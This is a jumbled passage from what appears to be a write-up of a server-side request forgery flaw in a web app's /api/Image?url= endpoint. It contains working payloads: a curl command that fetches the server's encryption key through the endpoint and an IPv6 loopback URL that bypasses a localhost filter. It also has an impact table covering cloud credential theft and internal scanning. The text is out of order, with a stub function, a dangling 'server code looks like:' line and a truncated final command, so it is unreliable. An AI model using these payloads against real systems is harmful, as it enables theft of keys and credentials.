```bash
curl "http://localhost:3000/api/Image?url=http://localhost:3000/encryptionkey.txt"
```

HTTP 200 with the encryption key in the body (may be text/plain despite image content-type header).

## 5. Impact Assessment

| Attack Vector | Impact |
|---------------|--------|
| Localhost file read | Exposure of source code, config files, secrets |
| Internal port scan | Discovery of admin panels, databases, Redis, Jenkins |
| Cloud metadata theft | IAM credentials, access tokens → cloud account compromise |
| Service interaction (e.g., Redis, Memcached) | Potential RCE via protocol smuggling |
```javascript
// The body of the localhost check is missing from the source page.
const isLocalhost = (url) => { /* ... */ };

if (isLocalhost(url)) return res.status(400).send('Localhost requests blocked');
```
http://[::1]:3000/encryptionkey.txt
```http
GET /api/Image?url=https://example.com/image.png HTTP/1.1
```

The server code (simplified) looks like:

curl "http://localhost:3000/api/Image